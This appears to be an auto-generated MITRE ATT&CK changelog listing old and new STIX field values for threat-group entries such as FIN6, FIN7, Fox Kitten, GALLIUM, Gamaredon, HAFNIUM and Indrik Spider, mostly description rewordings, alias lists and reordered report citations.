| external_references | {'source_name': 'Symantec Dragonfly', 'description': 'Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.', 'url': 'https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments'} | |
| external_references | {'source_name': 'Symantec Dragonfly 2.0 October 2017', 'description': 'Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks'} | |
| external_references | {'source_name': 'UK GOV FSB Factsheet April 2022', 'description': "UK Gov. (2022, April 5). Russia's FSB malign activity: factsheet. Retrieved April 5, 2022.", 'url': 'https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet'} |
| Description |
|---|
| [FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 17:23:58.316000+00:00 | 2022-06-02 20:11:01.957000+00:00 |
| aliases[2] | SKELETON SPIDER | ITG08 |
| aliases[3] | ITG08 | Skeleton Spider |
| external_references[1]['source_name'] | FIN6 | Skeleton Spider |
| external_references[1]['description'] | (Citation: FireEye FIN6 April 2016) | (Citation: Crowdstrike Global Threat Report Feb 2018) |
| external_references[2]['source_name'] | Magecart Group 6 | FIN6 |
| external_references[2]['description'] | (Citation: Security Intelligence ITG08 April 2020) | (Citation: FireEye FIN6 April 2016) |
| external_references[3]['source_name'] | SKELETON SPIDER | Magecart Group 6 |
| external_references[3]['description'] | (Citation: Crowdstrike Global Threat Report Feb 2018) | (Citation: Security Intelligence ITG08 April 2020) |
| external_references[5]['source_name'] | FireEye FIN6 April 2016 | Crowdstrike Global Threat Report Feb 2018 |
| external_references[5]['description'] | FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016. | CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018. |
| external_references[5]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf | https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report |
| external_references[6]['source_name'] | FireEye FIN6 Apr 2019 | FireEye FIN6 April 2016 |
| external_references[6]['description'] | McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. | FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016. |
| external_references[6]['url'] | https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html | https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf |
| external_references[7]['source_name'] | Security Intelligence ITG08 April 2020 | FireEye FIN6 Apr 2019 |
| external_references[7]['description'] | Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020. | McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. |
| external_references[7]['url'] | https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/ | https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html |
| external_references[8]['source_name'] | Crowdstrike Global Threat Report Feb 2018 | Security Intelligence ITG08 April 2020 |
| external_references[8]['description'] | CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018. | Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020. |
| external_references[8]['url'] | https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report | https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/ |
| Description |
|---|
| [FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013 primarily targeting the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. Since 2020 [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. [FIN7](https://attack.mitre.org/groups/G0046) may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appears to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Edward Millington'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | http://blog.morphisec.com/fin7-attacks-restaurant-industry |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 00:02:08.486000+00:00 | 2022-07-20 20:06:44.706000+00:00 |
| external_references[1]['source_name'] | FIN7 | Carbon Spider |
| external_references[1]['description'] | (Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018) | (Citation: CrowdStrike Carbon Spider August 2021) |
| external_references[2]['source_name'] | GOLD NIAGARA | FIN7 |
| external_references[2]['description'] | (Citation: Secureworks GOLD NIAGARA Threat Profile) | (Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018) |
| external_references[3]['source_name'] | ITG14 | GOLD NIAGARA |
| external_references[3]['description'] | ITG14 shares campaign overlap with FIN7.(Citation: IBM Ransomware Trends September 2020) | (Citation: Secureworks GOLD NIAGARA Threat Profile) |
| external_references[4]['source_name'] | Carbon Spider | FireEye CARBANAK June 2017 |
| external_references[4]['description'] | (Citation: CrowdStrike Carbon Spider August 2021) | Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018. |
| external_references[5]['source_name'] | FireEye FIN7 March 2017 | FireEye FIN7 April 2017 |
| external_references[5]['description'] | Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. | Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html | https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html |
| external_references[6]['source_name'] | FireEye FIN7 April 2017 | FireEye FIN7 Aug 2018 |
| external_references[6]['description'] | Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017. | Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018. |
| external_references[6]['url'] | https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html | https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html |
| external_references[7]['source_name'] | FireEye CARBANAK June 2017 | Secureworks GOLD NIAGARA Threat Profile |
| external_references[7]['description'] | Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018. | CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021. |
| external_references[7]['url'] | https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html | https://www.secureworks.com/research/threat-profiles/gold-niagara |
| external_references[8]['source_name'] | FireEye FIN7 Aug 2018 | FireEye FIN7 Shim Databases |
| external_references[8]['description'] | Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018. | Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017. |
| external_references[8]['url'] | https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html | https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html |
| external_references[9]['source_name'] | CrowdStrike Carbon Spider August 2021 | Morphisec FIN7 June 2017 |
| external_references[9]['description'] | Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021. | Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017. |
| external_references[9]['url'] | https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/ | http://blog.morphisec.com/fin7-attacks-restaurant-industry |
| external_references[10]['source_name'] | Morphisec FIN7 June 2017 | ITG14 |
| external_references[10]['description'] | Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017. | ITG14 shares campaign overlap with [FIN7](https://attack.mitre.org/groups/G0046).(Citation: IBM Ransomware Trends September 2020) |
| external_references[11]['source_name'] | FireEye FIN7 Shim Databases | CrowdStrike Carbon Spider August 2021 |
| external_references[11]['description'] | Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017. | Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021. |
| external_references[11]['url'] | https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html | https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/ |
| external_references[12]['source_name'] | Secureworks GOLD NIAGARA Threat Profile | FireEye FIN7 March 2017 |
| external_references[12]['description'] | CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021. | Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. |
| external_references[12]['url'] | https://www.secureworks.com/research/threat-profiles/gold-niagara | https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html |
| x_mitre_version | 2.0 | 2.1 |
| Description |
|---|
| [Fox Kitten](https://attack.mitre.org/groups/G0117) is threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. [Fox Kitten](https://attack.mitre.org/groups/G0117) has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering.(Citation: ClearkSky Fox Kitten February 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: Dragos PARISITE )(Citation: ClearSky Pay2Kitten December 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-20 22:02:30.995000+00:00 | 2022-06-02 20:12:00.458000+00:00 |
| aliases[2] | PIONEER KITTEN | Parisite |
| aliases[3] | Parisite | Pioneer Kitten |
| external_references[2]['source_name'] | PIONEER KITTEN | Pioneer Kitten |
| external_references[4]['source_name'] | ClearkSky Fox Kitten February 2020 | CISA AA20-259A Iran-Based Actor September 2020 |
| external_references[4]['description'] | ClearSky. (2020, February 16). Fox Kitten – Widespread Iranian Espionage-Offensive Campaign. Retrieved December 21, 2020. | CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020. |
| external_references[4]['url'] | https://www.clearskysec.com/fox-kitten/ | https://us-cert.cisa.gov/ncas/alerts/aa20-259a |
| external_references[5]['source_name'] | CrowdStrike PIONEER KITTEN August 2020 | ClearSky Pay2Kitten December 2020 |
| external_references[5]['description'] | Orleans, A. (2020, August 31). Who Is PIONEER KITTEN?. Retrieved December 21, 2020. | ClearSky. (2020, December 17). Pay2Key Ransomware – A New Campaign by Fox Kitten. Retrieved December 21, 2020. |
| external_references[5]['url'] | https://www.crowdstrike.com/blog/who-is-pioneer-kitten/ | https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf |
| external_references[6]['source_name'] | Dragos PARISITE | ClearkSky Fox Kitten February 2020 |
| external_references[6]['description'] | Dragos. (n.d.). PARISITE. Retrieved December 21, 2020. | ClearSky. (2020, February 16). Fox Kitten – Widespread Iranian Espionage-Offensive Campaign. Retrieved December 21, 2020. |
| external_references[6]['url'] | https://www.dragos.com/threat/parisite/ | https://www.clearskysec.com/fox-kitten/ |
| external_references[7]['source_name'] | ClearSky Pay2Kitten December 2020 | Dragos PARISITE |
| external_references[7]['description'] | ClearSky. (2020, December 17). Pay2Key Ransomware – A New Campaign by Fox Kitten. Retrieved December 21, 2020. | Dragos. (n.d.). PARISITE. Retrieved December 21, 2020. |
| external_references[7]['url'] | https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf | https://www.dragos.com/threat/parisite/ |
| external_references[8]['source_name'] | CISA AA20-259A Iran-Based Actor September 2020 | CrowdStrike PIONEER KITTEN August 2020 |
| external_references[8]['description'] | CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020. | Orleans, A. (2020, August 31). Who Is PIONEER KITTEN?. Retrieved December 21, 2020. |
| external_references[8]['url'] | https://us-cert.cisa.gov/ncas/alerts/aa20-259a | https://www.crowdstrike.com/blog/who-is-pioneer-kitten/ |
| Old Description | New Description |
|---|---|
| [GALLIUM](https://attack.mitre.org/groups/G0093) is a group that has been active since at least 2012, primarily targeting high-profile telecommunications networks. [GALLIUM](https://attack.mitre.org/groups/G0093) has been identified in some reporting as likely a Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019) | [GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-23 01:32:21.874000+00:00 | 2022-08-12 21:26:22.303000+00:00 |
| description | [GALLIUM](https://attack.mitre.org/groups/G0093) is a group that has been active since at least 2012, primarily targeting high-profile telecommunications networks. [GALLIUM](https://attack.mitre.org/groups/G0093) has been identified in some reporting as likely a Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019) | [GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022) |
| external_references[1]['source_name'] | GALLIUM | Operation Soft Cell |
| external_references[1]['description'] | (Citation: Microsoft GALLIUM December 2019) | (Citation: Cybereason Soft Cell June 2019) |
| external_references[2]['source_name'] | Operation Soft Cell | GALLIUM |
| external_references[2]['description'] | (Citation: Cybereason Soft Cell June 2019) | (Citation: Microsoft GALLIUM December 2019) |
| x_mitre_version | 2.0 | 3.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Unit 42 PingPull Jun 2022', 'description': 'Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022.', 'url': 'https://unit42.paloaltonetworks.com/pingpull-gallium/'} |
| Old Description | New Description |
|---|---|
| [Gamaredon Group](https://attack.mitre.org/groups/G0047) is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020) | [Gamaredon Group](https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022) In November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://attack.mitre.org/groups/G0047) to Russia's Federal Security Service (FSB) Center 18.(Citation: Bleepingcomputer Gamardeon FSB November 2021)(Citation: Microsoft Actinium February 2022) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/ | |
| external_references | https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/ | |
| external_references | https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-01-20 22:20:20.981000+00:00 | 2022-04-15 13:46:34.474000+00:00 |
| description | [Gamaredon Group](https://attack.mitre.org/groups/G0047) is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020) | [Gamaredon Group](https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022) In November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://attack.mitre.org/groups/G0047) to Russia's Federal Security Service (FSB) Center 18.(Citation: Bleepingcomputer Gamardeon FSB November 2021)(Citation: Microsoft Actinium February 2022) |
| external_references[1]['source_name'] | Gamaredon Group | ACTINIUM |
| external_references[1]['description'] | (Citation: Palo Alto Gamaredon Feb 2017) | (Citation: Microsoft Actinium February 2022) |
| external_references[2]['source_name'] | Palo Alto Gamaredon Feb 2017 | DEV-0157 |
| external_references[2]['description'] | Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017. | (Citation: Microsoft Actinium February 2022) |
| external_references[3]['source_name'] | TrendMicro Gamaredon April 2020 | Gamaredon Group |
| external_references[3]['description'] | Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020. | (Citation: Palo Alto Gamaredon Feb 2017) |
| external_references[4]['source_name'] | ESET Gamaredon June 2020 | IRON TILDEN |
| external_references[4]['description'] | Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020. | (Citation: Secureworks IRON TILDEN Profile) |
| x_mitre_version | 1.2 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | IRON TILDEN | |
| aliases | Primitive Bear | |
| aliases | ACTINIUM | |
| aliases | Armageddon | |
| aliases | Shuckworm | |
| aliases | DEV-0157 | |
| external_references | {'source_name': 'Armageddon', 'description': '(Citation: Symantec Shuckworm January 2022)'} | |
| external_references | {'source_name': 'Shuckworm', 'description': '(Citation: Symantec Shuckworm January 2022)'} | |
| external_references | {'source_name': 'Primitive Bear', 'description': '(Citation: Unit 42 Gamaredon February 2022)'} | |
| external_references | {'source_name': 'ESET Gamaredon June 2020', 'description': 'Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.', 'url': 'https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/'} | |
| external_references | {'source_name': 'TrendMicro Gamaredon April 2020', 'description': 'Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.', 'url': 'https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/'} | |
| external_references | {'source_name': 'Palo Alto Gamaredon Feb 2017', 'description': 'Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.', 'url': 'https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/'} | |
| external_references | {'source_name': 'Microsoft Actinium February 2022', 'description': 'Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.', 'url': 'https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/'} | |
| external_references | {'source_name': 'Secureworks IRON TILDEN Profile', 'description': 'Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-tilden'} | |
| external_references | {'source_name': 'Symantec Shuckworm January 2022', 'description': 'Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine'} | |
| external_references | {'source_name': 'Bleepingcomputer Gamardeon FSB November 2021', 'description': 'Toulas, B. (2018, November 4). Ukraine links members of Gamaredon hacker group to Russian FSB. Retrieved April 15, 2022.', 'url': 'https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/'} | |
| external_references | {'source_name': 'Unit 42 Gamaredon February 2022', 'description': 'Unit 42. (2022, February 3). Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.', 'url': 'https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/'} |
| Description |
|---|
| [HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-25 23:43:56.055000+00:00 | 2022-07-06 20:05:26.079000+00:00 |
| external_references[2]['source_name'] | Microsoft HAFNIUM March 2020 | Volexity Exchange Marauder March 2021 |
| external_references[2]['description'] | MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021. | Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021. |
| external_references[2]['url'] | https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ | https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ |
| external_references[3]['source_name'] | Volexity Exchange Marauder March 2021 | Microsoft HAFNIUM March 2020 |
| external_references[3]['description'] | Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021. | MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021. |
| external_references[3]['url'] | https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ | https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ |
| x_mitre_version | 1.0 | 1.2 |
| Old Description | New Description |
|---|---|
| [Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that as been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019) | [Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 16:14:32.314000+00:00 | 2022-09-15 19:49:18.799000+00:00 |
| description | [Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that as been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019) | [Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019) |
| x_mitre_version | 2.0 | 2.1 |
| Old Description | New Description |
|---|---|
